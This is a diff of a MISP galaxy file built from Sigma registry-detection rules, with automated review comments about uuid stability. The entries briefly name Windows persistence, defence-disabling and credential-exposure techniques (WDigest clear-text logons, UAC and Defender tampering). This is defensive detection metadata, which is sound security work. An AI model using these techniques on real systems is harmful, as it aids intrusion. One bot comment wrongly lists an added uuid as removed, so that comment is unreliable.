@@ -12106,10 +15326,10 @@ "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" ], "tags": [ @@ -12166,6 +15386,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "value": "Usage of Sysinternals Tools - Registry" }, @@ -12183,7 +15412,6 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", - "https://attack.mitre.org/techniques/T1037/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" ], "tags": [ @@ -12192,6 +15420,15 @@ "attack.lateral_movement" ] }, + "related": [ + { + "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "value": "Logon Scripts Creation in UserInitMprLogonScript Registry" }, 
@@ -12208,9 +15445,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", "https://twitter.com/Hexacorn/status/991447379864932352", + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", + "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" ], "tags": [ 
@@ -12218,9 +15455,52 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", "value": "Execution DLL of Choice Using WAB.EXE" }, + { + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + ], + "filename": "registry_set_persistence_app_paths.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ] + }, + "related": [ + { + "dest-uuid": "6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "value": "Potential Persistence Via App Paths Default Property" + }, { "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 
vulnerability and DevilsTongue malware by threat group Sourgum", "meta": { @@ -12234,8 +15514,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" ], "tags": [ @@ -12246,6 +15526,15 @@ "cve.2021.31979" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", "value": "CVE-2021-31979 CVE-2021-33771 Exploits" }, 
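Review bot: The new `Potential Persistence Via App Paths Default Property` entry ends its `description` with a literal `\n` (`...per-application, per-process basis.\n`), a leftover of the YAML block scalar in the upstream rule that no other description in this patch carries; the generator should strip trailing whitespace (`description.rstrip()` or equivalent) so MISP does not render a dangling blank line. Its `falsepositive` text, `Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)`, is copied verbatim and points at a detection section this galaxy entry does not include, so a MISP user is referred to nothing (and inherits the upstream typo `on of`); fixing the wording upstream is the cleanest route, since the generator only carries metadata. The single `related` item is consistent with `attack.t1546.012` being the only technique tag on this entry, so no additional relation is expected here. The enclosing cluster array continues outside the hunk.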
@@ -12274,28 +15563,28 @@ "value": "Activate Suppression of Windows Security Center Notifications" }, { - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "meta": { - "author": "frack113", - "creation_date": "2022/08/20", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", "falsepositive": [ - "Legitimate use of the dll." + "Unknown" ], - "filename": "registry_set_scrobj_dll_persistence.yml", - "level": "medium", + "filename": "registry_set_persistence_chm.yml", + "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml" ], "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.persistence" ] }, - "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "value": "Scrobj.dll COM Hijacking" + "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "value": "Potential Persistence Via CHM Helper DLL" }, { "description": "Detects potential persistence using Appx DebugPath", 
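Review bot: In this hunk the cluster with uuid `fe20dda1-6f37-4379-bbe0-a98d400cae90` (`Scrobj.dll COM Hijacking`) disappears and `976dd1f2-a484-45ec-aa1d-0e87e882262b` (`Potential Persistence Via CHM Helper DLL`) takes its slot; the author, date, filename and `level` (`medium` to `high`) all differ, so this is a different rule rather than an edit of the same one. If `fe20dda1…` is not re-emitted elsewhere in the regenerated file, any MISP event already tagged with that galaxy cluster loses its target, which is exactly the kind of silent breakage a galaxy refresh should avoid; please confirm the uuid survives, or keep the old entry (flagging it as superseded in its description) rather than dropping it. The same verification applies to `36803969-5421-41ec-b92f-8500f79c23b0` and `d88d0ab2-e696-4d40-a2ed-9790064e66b3`, which this patch removes outright a few hunks later. The new entry also carries only the tactic tag `attack.persistence` and therefore no `related` link, unlike the neighbouring `Potential Persistence Using DebugPath` entry.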
@@ -12319,8 +15608,17 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", - "value": "Windows Registry Persistence DebugPath" + "value": "Potential Persistence Using DebugPath" }, { "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", @@ -12343,6 +15641,15 @@ "attack.t1112" ] }, + "related": [ + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", "value": "CrashControl CrashDump Disabled" }, @@ -12368,6 +15675,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", "value": "Disable UAC Using Registry" }, @@ -12384,8 +15700,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" ], "tags": [ 
@@ -12420,34 +15736,6 @@ "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "value": "Registry Explorer Policy Modification" }, - { - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "meta": { - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", - "creation_date": "2018/04/11", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_globalflags_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" - ] - }, - "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", - "value": "Potential GlobalFlags Registry Persistence Attempt" - }, { "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "meta": { @@ -12470,7 +15758,7 @@ ] }, "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", - "value": "Modify Attachment Manager Settings - Associations" + "value": "Potential Attachment Manager Settings Associations Tamper" }, { "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", 
@@ -12512,8 +15800,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" ], "tags": [ 
@@ -12537,13 +15825,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ 
@@ -12555,30 +15843,6 @@
 "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b",
 "value": "RDP Sensitive Settings Changed to Zero"
 },
- {
- "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_ie_persistence.yml",
- "level": "low",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ]
- },
- "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3",
- "value": "Modification of IE Registry Settings"
- },
 {
 "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability",
 "meta": {
@@ -12618,8 +15882,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml"
 ],
 "tags": [
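Review bot: The cluster with uuid d88d0ab2-e696-4d40-a2ed-9790064e66b3 ("Modification of IE Registry Settings") is deleted outright in the `@@ -12555` hunk and nothing visible re-adds it under a new name, so any `related` entry, event tag or sighting that already references that uuid dangles once the galaxy is re-imported. The VSTO move in the `@@ -12808` and `@@ -12885` hunks shows the pattern that avoids this: new `filename` and `value`, same uuid `9d15044a-7cfe-4d23-8085-6ebc11df7685`. If the upstream rule was only renamed, the regenerated entry should carry the old uuid; if it was really retired, the commit description should say so. The same question applies to 707e097c-e20f-4f67-8807-1f72ff4500d6 (`@@ -13254` hunk), a1b1fd53-9c4a-444c-bae0-34a330fc7aa8 (`@@ -13651` hunk), 41f6531d-af6e-4c6e-918f-b946f2b85a36 (`@@ -13727` hunk) and fdbf0b9d-0182-4c43-893b-a1eaab92d085, which the `@@ -13600` hunk replaces in place with a different rule under a new uuid.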
@@ -12628,6 +15892,15 @@
 "attack.t1546.009"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "7d57b371-10c2-45e5-b3cc-83a8fb380e4c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298",
 "value": "Session Manager Autorun Keys Modification"
 },
@@ -12655,6 +15928,29 @@
 "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498",
 "value": "Add Debugger Entry To Hangs Key For Persistence"
 },
+ {
+ "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2023/01/11",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_powershell_execution_policy.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "fad91067-08c5-4d1a-8d8c-d96a21b37814",
+ "value": "Potential PowerShell Execution Policy Tampering"
+ },
 {
 "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'",
 "meta": {
@@ -12678,6 +15974,22 @@
 "attack.t1548"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "07743f65-7ec9-404a-a519-913db7118a8d",
 "value": "COM Hijack via Sdclt"
 },
@@ -12718,8 +16030,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
+ "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml"
 ],
 "tags": [
@@ -12743,9 +16055,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
 "https://twitter.com/inversecos/status/1494174785621819397",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml"
 ],
 "tags": [
@@ -12781,6 +16093,15 @@
 "attack.t1569.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130",
 "value": "CobaltStrike Service Installations in Registry"
 },
@@ -12808,6 +16129,40 @@
 "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1",
 "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension"
 },
+ {
+ "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.",
+ "meta": {
+ "author": "Bhabesh Raj",
+ "creation_date": "2021/01/10",
+ "falsepositive": [
+ "Legitimate Addin Installation"
+ ],
+ "filename": "registry_set_persistence_office_vsto.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/_vivami/status/1347925307643355138",
+ "https://vanmieghem.io/stealth-outlook-persistence/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml"
+ ],
+ "tags": [
+ "attack.t1137.006",
+ "attack.persistence"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685",
+ "value": "Potential Persistence Via Visual Studio Tools for Office"
+ },
 {
 "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
 "meta": {
@@ -12822,10 +16177,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml"
 ],
 "tags": [
@@ -12849,8 +16204,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files",
 "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index",
+ "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml"
 ],
 "tags": [
@@ -12858,6 +16213,15 @@
 "attack.t1588.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8",
 "value": "Suspicious Keyboard Layout Load"
 },
@@ -12885,31 +16249,6 @@
 "uuid": "93d298a1-d28f-47f1-a468-d971e7796679",
 "value": "Disable Tamper Protection on Windows Defender"
 },
- {
- "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/01/10",
- "falsepositive": [
- "Legitimate Addin Installation"
- ],
- "filename": "registry_set_office_vsto_persistence.yml",
- "level": "medium",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://vanmieghem.io/stealth-outlook-persistence/",
- "https://twitter.com/_vivami/status/1347925307643355138",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml"
- ],
- "tags": [
- "attack.t1137.006",
- "attack.persistence"
- ]
- },
- "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685",
- "value": "Stealthy VSTO Persistence"
- },
 {
 "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials",
 "meta": {
@@ -12948,8 +16287,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
 "https://twitter.com/dottor_morte/status/1544652325570191361",
+ "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml"
 ],
 "tags": [
@@ -12982,6 +16321,15 @@
 "attack.t1562"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "4f281b83-0200-4b34-bf35-d24687ea57c2",
 "value": "ETW Logging Disabled For SCM"
 },
@@ -13022,8 +16370,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/codesigning.html",
 "https://github.com/gtworek/PSBits/tree/master/SIP",
+ "https://persistence-info.github.io/Data/codesigning.html",
 "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml"
 ],
@@ -13033,6 +16381,15 @@
 "attack.t1553.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "543fceb5-cb92-40cb-aacf-6913d4db58bc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1",
 "value": "Persistence Via New SIP Provider"
 },
@@ -13051,8 +16408,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml"
 ],
 "tags": [
@@ -13108,6 +16465,15 @@
 "attack.t1562.004"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f",
 "value": "Disable Microsoft Defender Firewall via Registry"
 },
@@ -13133,6 +16499,15 @@
 "attack.t1574"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b",
 "value": "Potential Registry Persistence Attempt Via DbgManagedDebugger"
 },
@@ -13181,6 +16556,15 @@
 "attack.t1588.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "8023f872-3f1d-4301-a384-801889917ab4",
 "value": "Usage of Renamed Sysinternals Tools - RegistrySet"
 },
@@ -13197,8 +16581,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md",
 "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml"
 ],
 "tags": [
@@ -13206,6 +16590,15 @@
 "attack.t1546.015"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82",
 "value": "COM Hijacking via TreatAs"
 },
@@ -13254,34 +16647,18 @@
 "attack.t1562.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3",
 "value": "Disable Winevt Event Logging Via Registry"
 },
- {
- "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/10",
- "falsepositive": [
- "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)"
- ],
- "filename": "registry_set_susp_app_paths_persistence.yml",
- "level": "high",
